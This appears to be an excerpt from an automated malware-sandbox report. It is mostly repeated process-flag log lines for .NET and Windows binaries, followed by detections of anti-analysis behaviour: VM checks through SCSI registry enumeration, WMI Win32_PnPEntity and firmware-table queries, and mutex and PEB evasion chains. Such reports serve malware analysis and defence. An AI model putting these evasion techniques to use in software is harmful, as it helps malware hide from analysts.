Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1648, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_33-3887

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_33-3875

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
